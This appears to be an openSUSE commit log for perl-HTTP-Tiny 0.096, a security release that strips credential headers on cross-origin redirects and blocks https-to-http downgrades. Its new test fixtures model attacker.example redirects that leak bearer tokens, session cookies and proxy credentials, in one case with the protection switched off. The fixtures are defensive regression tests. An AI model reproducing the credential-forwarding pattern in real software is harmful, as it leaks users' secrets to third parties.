Script 'mail_helper' called by obssrc Hello community, here is the log from the commit of package perl-HTTP-Tiny for openSUSE:Factory checked in at 2026-06-08 16:54:52 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Comparing /work/SRC/openSUSE:Factory/perl-HTTP-Tiny (Old) and /work/SRC/openSUSE:Factory/.perl-HTTP-Tiny.new.2375 (New) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Package is "perl-HTTP-Tiny" Mon Jun 8 16:54:52 2026 rev:23 rq:1357974 version:0.096 Changes: -------- --- /work/SRC/openSUSE:Factory/perl-HTTP-Tiny/perl-HTTP-Tiny.changes 2026-05-18 17:48:59.934737706 +0200 +++ /work/SRC/openSUSE:Factory/.perl-HTTP-Tiny.new.2375/perl-HTTP-Tiny.changes 2026-06-08 16:54:56.281384246 +0200 @@ -1,0 +2,16 @@ +Mon Jun 8 09:57:24 UTC 2026 - Tina Müller <[email protected]> + +- updated to 0.096 + see /usr/share/doc/packages/perl-HTTP-Tiny/Changes + + 0.096 2026-06-08 11:21:49+02:00 Europe/Brussels + - No changes from 0.095-TRIAL + 0.095 2026-06-03 13:10:05+02:00 Europe/Brussels (TRIAL RELEASE) + [!!! SECURITY !!!] + - Caller-supplied C<Authorization>, C<Cookie>, and C<Proxy-Authorization> + headers are now stripped on cross-origin redirects by default. Use + allow_credentialed_redirects to opt out. + - Redirects are no longer automatically followed when going from https to http. + Use allow_downgrade to revert to the original behaviour. + +------------------------------------------------------------------- Old: ---- HTTP-Tiny-0.094.tar.gz New: ---- HTTP-Tiny-0.096.tar.gz ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Other differences: ------------------ ++++++ perl-HTTP-Tiny.spec ++++++ --- /var/tmp/diff_new_pack.5F5B63/_old 2026-06-08 16:54:57.173421211 +0200 +++ /var/tmp/diff_new_pack.5F5B63/_new 2026-06-08 16:54:57.181421542 +0200 @@ -18,7 +18,7 @@ %define cpan_name HTTP-Tiny Name: perl-HTTP-Tiny -Version: 0.094 +Version: 0.096 Release: 0 License: Artistic-1.0 OR GPL-1.0-or-later Summary: Small, simple, correct HTTP/1.1 client ++++++ HTTP-Tiny-0.094.tar.gz -> HTTP-Tiny-0.096.tar.gz ++++++ diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/Changes new/HTTP-Tiny-0.096/Changes --- old/HTTP-Tiny-0.094/Changes 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/Changes 2026-06-08 11:21:52.000000000 +0200 @@ -1,5 +1,19 @@ Release notes for HTTP-Tiny +0.096 2026-06-08 11:21:49+02:00 Europe/Brussels + + - No changes from 0.095-TRIAL + +0.095 2026-06-03 13:10:05+02:00 Europe/Brussels (TRIAL RELEASE) + [!!! SECURITY !!!] + + - Caller-supplied C<Authorization>, C<Cookie>, and C<Proxy-Authorization> + headers are now stripped on cross-origin redirects by default. Use + allow_credentialed_redirects to opt out. + + - Redirects are no longer automatically followed when going from https to http. + Use allow_downgrade to revert to the original behaviour. + 0.094 2026-05-17 10:31:00+02:00 Europe/Brussels - No changes from 0.093-TRIAL diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/MANIFEST new/HTTP-Tiny-0.096/MANIFEST --- old/HTTP-Tiny-0.094/MANIFEST 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/MANIFEST 2026-06-08 11:21:52.000000000 +0200 @@ -81,6 +81,20 @@ corpus/redirect-08.txt corpus/redirect-09.txt corpus/redirect-10.txt +corpus/redirect-11.txt +corpus/redirect-12.txt +corpus/redirect-13.txt +corpus/redirect-14.txt +corpus/redirect-15.txt +corpus/redirect-16.txt +corpus/redirect-17.txt +corpus/redirect-18.txt +corpus/redirect-19.txt +corpus/redirect-20.txt +corpus/redirect-21.txt +corpus/redirect-22.txt +corpus/redirect-23.txt +corpus/redirect-24.txt corpus/snake-oil.crt cpanfile dist.ini diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/META.json new/HTTP-Tiny-0.096/META.json --- old/HTTP-Tiny-0.094/META.json 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/META.json 2026-06-08 11:21:52.000000000 +0200 @@ -107,7 +107,7 @@ "provides" : { "HTTP::Tiny" : { "file" : "lib/HTTP/Tiny.pm", - "version" : "0.094" + "version" : "0.096" } }, "release_status" : "stable", @@ -122,7 +122,7 @@ "web" : "https://github.com/Perl-Toolchain-Gang/HTTP-Tiny"; } }, - "version" : "0.094", + "version" : "0.096", "x_authority" : "cpan:DAGOLDEN", "x_contributors" : [ "Alan Gardner <[email protected]>", diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/META.yml new/HTTP-Tiny-0.096/META.yml --- old/HTTP-Tiny-0.094/META.yml 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/META.yml 2026-06-08 11:21:52.000000000 +0200 @@ -39,7 +39,7 @@ provides: HTTP::Tiny: file: lib/HTTP/Tiny.pm - version: '0.094' + version: '0.096' recommends: HTTP::CookieJar: '0.001' IO::Socket::IP: '0.32' @@ -61,7 +61,7 @@ bugtracker: https://github.com/Perl-Toolchain-Gang/HTTP-Tiny/issues homepage: https://github.com/Perl-Toolchain-Gang/HTTP-Tiny repository: https://github.com/Perl-Toolchain-Gang/HTTP-Tiny.git -version: '0.094' +version: '0.096' x_authority: cpan:DAGOLDEN x_contributors: - 'Alan Gardner <[email protected]>' diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/Makefile.PL new/HTTP-Tiny-0.096/Makefile.PL --- old/HTTP-Tiny-0.094/Makefile.PL 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/Makefile.PL 2026-06-08 11:21:52.000000000 +0200 @@ -43,7 +43,7 @@ "lib" => 0, "open" => 0 }, - "VERSION" => "0.094", + "VERSION" => "0.096", "test" => { "TESTS" => "t/*.t" } diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/README new/HTTP-Tiny-0.096/README --- old/HTTP-Tiny-0.094/README 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/README 2026-06-08 11:21:52.000000000 +0200 @@ -2,7 +2,7 @@ HTTP::Tiny - A small, simple, correct HTTP/1.1 client VERSION - version 0.094 + version 0.096 SYNOPSIS use HTTP::Tiny; @@ -41,9 +41,22 @@ This constructor returns a new HTTP::Tiny object. Valid attributes include: - * "agent" â A user-agent string (defaults to 'HTTP-Tiny/$VERSION'). If - "agent" â ends in a space character, the default user-agent string - is appended. + * "agent" â A user-agent string (defaults to '"HTTP-Tiny/$VERSION"'). + If "agent" â ends in a space character, the default user-agent + string is appended. + + * "allow_credentialed_redirects" - If a "3XX" redirects to a different + scheme, host or port, by default HTTP::Tiny will strip away + caller-supplied "Authorization", "Cookie" and "Proxy-Authorization" + headers from the redirected request and from all subsequent requests + in the chain. Set this to a true value to revert to the legacy + behavior of forwarding those headers. Default is "false". + + * "allow_downgrade" â If a "3XX" redirect changes the scheme from + "https" to plain "http", HTTP::Tiny will by default refuse to follow + it, returning the "3XX" response. Set this to a true value to revert + to the legacy behavior of redirecting "https" to "http". Default is + "false". * "cookie_jar" â An instance of HTTP::CookieJar â or equivalent class that supports the "add" and "cookie_header" methods @@ -130,7 +143,7 @@ response. The "success" field of the response will be true if the status code is - 2XX. + "2XX". post_form $response = $http->post_form($url, $form_data); @@ -150,7 +163,7 @@ will be ignored. The "success" field of the response will be true if the status code is - 2XX. + "2XX". mirror $response = $http->mirror($url, $file, \%options) @@ -166,7 +179,7 @@ header yourself in the "$options->{headers}" hash. The "success" field of the response will be true if the status code is - 2XX or if the status code is 304 (unmodified). + "2XX" or if the status code is 304 (unmodified). If the file was modified and the server response includes a properly formatted "Last-Modified" header, the file modification time will be @@ -185,8 +198,7 @@ this applies to redirection. If the URL includes a "user:password" stanza, they will be used for - Basic-style authorization headers. (Authorization headers will not be - included in a redirected request.) For example: + Basic-style authorization headers. For example: $http->request('GET', 'http://Aladdin:open [email protected]/'); @@ -195,6 +207,10 @@ $http->request('GET', 'http://john%40example.com:[email protected]/'); + Caller-supplied "Authorization", "Cookie" and "Proxy-Authorization" + headers are stripped on cross-origin redirects. See "new"'s + "allow_credentialed_redirects" attribute to opt out. + A hashref of options may be appended to modify the request. Valid options are: @@ -249,8 +265,8 @@ The "request" method returns a hashref containing the response. The hashref will have the following keys: - * "success" â Boolean indicating whether the operation returned a 2XX - status code + * "success" â Boolean indicating whether the operation returned a + "2XX" status code * "url" â URL that provided the response. This is the URL of the request unless there were redirections, in which case it is the last diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-11.txt new/HTTP-Tiny-0.096/corpus/redirect-11.txt --- old/HTTP-Tiny-0.094/corpus/redirect-11.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-11.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,21 @@ +url + https://victim.example/secret +expected + refused-redirect-body +expected_url + https://victim.example/secret +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 21 +Location: http://victim.example/secret + +refused-redirect-body + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-12.txt new/HTTP-Tiny-0.096/corpus/redirect-12.txt --- old/HTTP-Tiny-0.094/corpus/redirect-12.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-12.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,36 @@ +url + https://victim.example/secret +expected + success +expected_url + http://victim.example/secret +new_args + allow_downgrade: 1 +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://victim.example/secret + +redirect + +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 7 + +success diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-13.txt new/HTTP-Tiny-0.096/corpus/redirect-13.txt --- old/HTTP-Tiny-0.094/corpus/redirect-13.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-13.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,35 @@ +url + https://example.com/index.html +expected + abcdefghijklmnopqrstuvwxyz1234567890abcdef +expected_url + https://example.com/index2.html +---------- +GET /index.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/html +Content-Length: 53 +Location: https://example.com/index2.html + +<a href="https://example.com/index2.html";>redirect</a> + +---------- +GET /index2.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 42 + +abcdefghijklmnopqrstuvwxyz1234567890abcdef + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-14.txt new/HTTP-Tiny-0.096/corpus/redirect-14.txt --- old/HTTP-Tiny-0.094/corpus/redirect-14.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-14.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,35 @@ +url + http://example.com/index.html +expected + abcdefghijklmnopqrstuvwxyz1234567890abcdef +expected_url + https://example.com/index2.html +---------- +GET /index.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/html +Content-Length: 53 +Location: https://example.com/index2.html + +<a href="https://example.com/index2.html";>redirect</a> + +---------- +GET /index2.html HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 42 + +abcdefghijklmnopqrstuvwxyz1234567890abcdef + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-15.txt new/HTTP-Tiny-0.096/corpus/redirect-15.txt --- old/HTTP-Tiny-0.094/corpus/redirect-15.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-15.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,57 @@ +url + http://victim.example/secret +expected + pwned +expected_url + http://victim.example/back +headers + Authorization: Bearer SECRET-TOKEN + Cookie: session=SECRET-SESSION + Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +---------- +GET /secret HTTP/1.1 +Host: victim.example +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://victim.example/back + +redirect + +---------- +GET /back HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 5 + +pwned + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-16.txt new/HTTP-Tiny-0.096/corpus/redirect-16.txt --- old/HTTP-Tiny-0.094/corpus/redirect-16.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-16.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,47 @@ +url + http://victim.example/secret +expected + pwned +expected_url + http://attacker.example/loot +new_args + allow_credentialed_redirects: 1 +headers + Authorization: Bearer SECRET-TOKEN + Cookie: session=SECRET-SESSION + Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +---------- +GET /secret HTTP/1.1 +Host: victim.example +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Proxy-Authorization: Basic c2VjcmV0OnNlY3JldA== +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 5 + +pwned + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-17.txt new/HTTP-Tiny-0.096/corpus/redirect-17.txt --- old/HTTP-Tiny-0.094/corpus/redirect-17.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-17.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,39 @@ +url + http://example.com/a +expected + ok +expected_url + http://example.com/b +headers + Authorization: Bearer SECRET-TOKEN +---------- +GET /a HTTP/1.1 +Host: example.com +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://example.com/b + +redirect + +---------- +GET /b HTTP/1.1 +Host: example.com +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-18.txt new/HTTP-Tiny-0.096/corpus/redirect-18.txt --- old/HTTP-Tiny-0.094/corpus/redirect-18.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-18.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,38 @@ +url + http://example.com:8080/foo +expected + ok +expected_url + http://example.com:8081/bar +headers + Authorization: Bearer SECRET-TOKEN +---------- +GET /foo HTTP/1.1 +Host: example.com:8080 +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://example.com:8081/bar + +redirect + +---------- +GET /bar HTTP/1.1 +Host: example.com:8081 +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-19.txt new/HTTP-Tiny-0.096/corpus/redirect-19.txt --- old/HTTP-Tiny-0.094/corpus/redirect-19.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-19.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,40 @@ +url + https://example.com:8443/foo +expected + ok +expected_url + http://example.com:8443/foo +new_args + allow_downgrade: 1 +headers + Authorization: Bearer SECRET-TOKEN +---------- +GET /foo HTTP/1.1 +Host: example.com:8443 +Authorization: Bearer SECRET-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://example.com:8443/foo + +redirect + +---------- +GET /foo HTTP/1.1 +Host: example.com:8443 +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-20.txt new/HTTP-Tiny-0.096/corpus/redirect-20.txt --- old/HTTP-Tiny-0.094/corpus/redirect-20.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-20.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,41 @@ +url + http://victim.example/submit +method + POST +expected + ok +expected_url + http://attacker.example/loot +headers + Authorization: Bearer SECRET-TOKEN +---------- +POST /submit HTTP/1.1 +Host: victim.example +Authorization: Bearer SECRET-TOKEN +Connection: close +Content-Length: 0 +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 303 See Other +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: http://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-21.txt new/HTTP-Tiny-0.096/corpus/redirect-21.txt --- old/HTTP-Tiny-0.094/corpus/redirect-21.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-21.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,38 @@ +url + https://victim.example/x +expected + pwned +expected_url + https://attacker.example/loot +headers + Authorization: Bearer TRUSTED-TOKEN +---------- +GET /x HTTP/1.1 +Host: victim.example +Authorization: Bearer TRUSTED-TOKEN +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: //attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 5 + +pwned + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-22.txt new/HTTP-Tiny-0.096/corpus/redirect-22.txt --- old/HTTP-Tiny-0.094/corpus/redirect-22.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-22.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,40 @@ +url + http://example.com/login +expected + ok +expected_url + https://example.com/login +headers + Authorization: Bearer SECRET-TOKEN + Cookie: session=SECRET-SESSION +---------- +GET /login HTTP/1.1 +Host: example.com +Authorization: Bearer SECRET-TOKEN +Cookie: session=SECRET-SESSION +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: https://example.com/login + +redirect + +---------- +GET /login HTTP/1.1 +Host: example.com +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-23.txt new/HTTP-Tiny-0.096/corpus/redirect-23.txt --- old/HTTP-Tiny-0.094/corpus/redirect-23.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-23.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,36 @@ +url + https://user:[email protected]/secret +expected + ok +expected_url + https://attacker.example/loot +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION +Authorization: Basic dXNlcjpwYXNz + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: https://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/corpus/redirect-24.txt new/HTTP-Tiny-0.096/corpus/redirect-24.txt --- old/HTTP-Tiny-0.094/corpus/redirect-24.txt 1970-01-01 01:00:00.000000000 +0100 +++ new/HTTP-Tiny-0.096/corpus/redirect-24.txt 2026-06-08 11:21:52.000000000 +0200 @@ -0,0 +1,38 @@ +url + https://user:[email protected]/secret +expected + ok +expected_url + https://attacker.example/loot +new_args + allow_credentialed_redirects: 1 +---------- +GET /secret HTTP/1.1 +Host: victim.example +Connection: close +User-Agent: HTTP-Tiny/VERSION +Authorization: Basic dXNlcjpwYXNz + +---------- +HTTP/1.1 302 Found +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 8 +Location: https://attacker.example/loot + +redirect + +---------- +GET /loot HTTP/1.1 +Host: attacker.example +Connection: close +User-Agent: HTTP-Tiny/VERSION + +---------- +HTTP/1.1 200 OK +Date: Thu, 03 Feb 1994 00:00:00 GMT +Content-Type: text/plain +Content-Length: 2 + +ok + diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/dist.ini new/HTTP-Tiny-0.096/dist.ini --- old/HTTP-Tiny-0.094/dist.ini 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/dist.ini 2026-06-08 11:21:52.000000000 +0200 @@ -12,7 +12,6 @@ stopwords = UA stopwords = proxying stopwords = Tunnelling -stopwords = 2XX stopwords = RFC7230 stopwords = RFC7231 stopwords = RFC7232 diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/HTTP-Tiny-0.094/lib/HTTP/Tiny.pm new/HTTP-Tiny-0.096/lib/HTTP/Tiny.pm --- old/HTTP-Tiny-0.094/lib/HTTP/Tiny.pm 2026-05-17 10:31:03.000000000 +0200 +++ new/HTTP-Tiny-0.096/lib/HTTP/Tiny.pm 2026-06-08 11:21:52.000000000 +0200 @@ -4,7 +4,7 @@ use warnings; # ABSTRACT: A small, simple, correct HTTP/1.1 client -our $VERSION = '0.094'; +our $VERSION = '0.096'; sub _croak { require Carp; Carp::croak(@_) } @@ -15,9 +15,19 @@ #pod This constructor returns a new HTTP::Tiny object. Valid attributes include: #pod #pod =for :list -#pod * C<agent> — A user-agent string (defaults to 'HTTP-Tiny/$VERSION'). If +#pod * C<agent> — A user-agent string (defaults to 'C<HTTP-Tiny/$VERSION>'). If #pod C<agent> — ends in a space character, the default user-agent string is #pod appended. +#pod * C<allow_credentialed_redirects> - If a C<3XX> redirects to a different scheme, +#pod host or port, by default HTTP::Tiny will strip away caller-supplied +#pod C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers from the +#pod redirected request and from all subsequent requests in the chain. Set this to a +#pod true value to revert to the legacy behavior of forwarding those headers. +#pod Default is C<false>. +#pod * C<allow_downgrade> — If a C<3XX> redirect changes the scheme from C<https> to +#pod plain C<http>, HTTP::Tiny will by default refuse to follow it, returning the +#pod C<3XX> response. Set this to a true value to revert to the legacy behavior of +#pod redirecting C<https> to C<http>. Default is C<false>. #pod * C<cookie_jar> — An instance of L<HTTP::CookieJar> — or equivalent class #pod that supports the C<add> and C<cookie_header> methods #pod * C<default_headers> — A hashref of default headers to apply to requests @@ -81,9 +91,9 @@ my @attributes; BEGIN { @attributes = qw( - cookie_jar default_headers http_proxy https_proxy keep_alive - local_address max_redirect max_size proxy no_proxy - SSL_options verify_SSL + allow_credentialed_redirects allow_downgrade cookie_jar default_headers + http_proxy https_proxy keep_alive local_address max_redirect max_size + proxy no_proxy SSL_options verify_SSL ); my %persist_ok = map {; $_ => 1 } qw( cookie_jar default_headers max_redirect max_size @@ -227,7 +237,7 @@ #pod URL must have unsafe characters escaped and international domain names encoded. #pod See C<request()> for valid options and a description of the response. #pod -#pod The C<success> field of the response will be true if the status code is 2XX. +#pod The C<success> field of the response will be true if the status code is C<2XX>. #pod #pod =cut @@ -260,7 +270,7 @@ #pod encoded. See C<request()> for valid options and a description of the response. #pod Any C<content-type> header or content in the options hashref will be ignored. #pod -#pod The C<success> field of the response will be true if the status code is 2XX. +#pod The C<success> field of the response will be true if the status code is C<2XX>. #pod #pod =cut @@ -301,8 +311,8 @@ #pod may specify a different C<If-Modified-Since> header yourself in the C<< #pod $options->{headers} >> hash. #pod -#pod The C<success> field of the response will be true if the status code is 2XX -#pod or if the status code is 304 (unmodified). +#pod The C<success> field of the response will be true if the status code is C<2XX> +#pod or if the status code is C<304> (unmodified). #pod #pod If the file was modified and the server response includes a properly #pod formatted C<Last-Modified> header, the file modification time will @@ -364,8 +374,7 @@ #pod how this applies to redirection. #pod #pod If the URL includes a "user:password" stanza, they will be used for Basic-style -#pod authorization headers. (Authorization headers will not be included in a -#pod redirected request.) For example: +#pod authorization headers. For example: #pod #pod $http->request('GET', 'http://Aladdin:open [email protected]/'); #pod @@ -374,6 +383,10 @@ #pod #pod $http->request('GET', 'http://john%40example.com:[email protected]/'); #pod +#pod Caller-supplied C<Authorization>, C<Cookie> and C<Proxy-Authorization> headers +#pod are stripped on cross-origin redirects. See L</new>'s +#pod 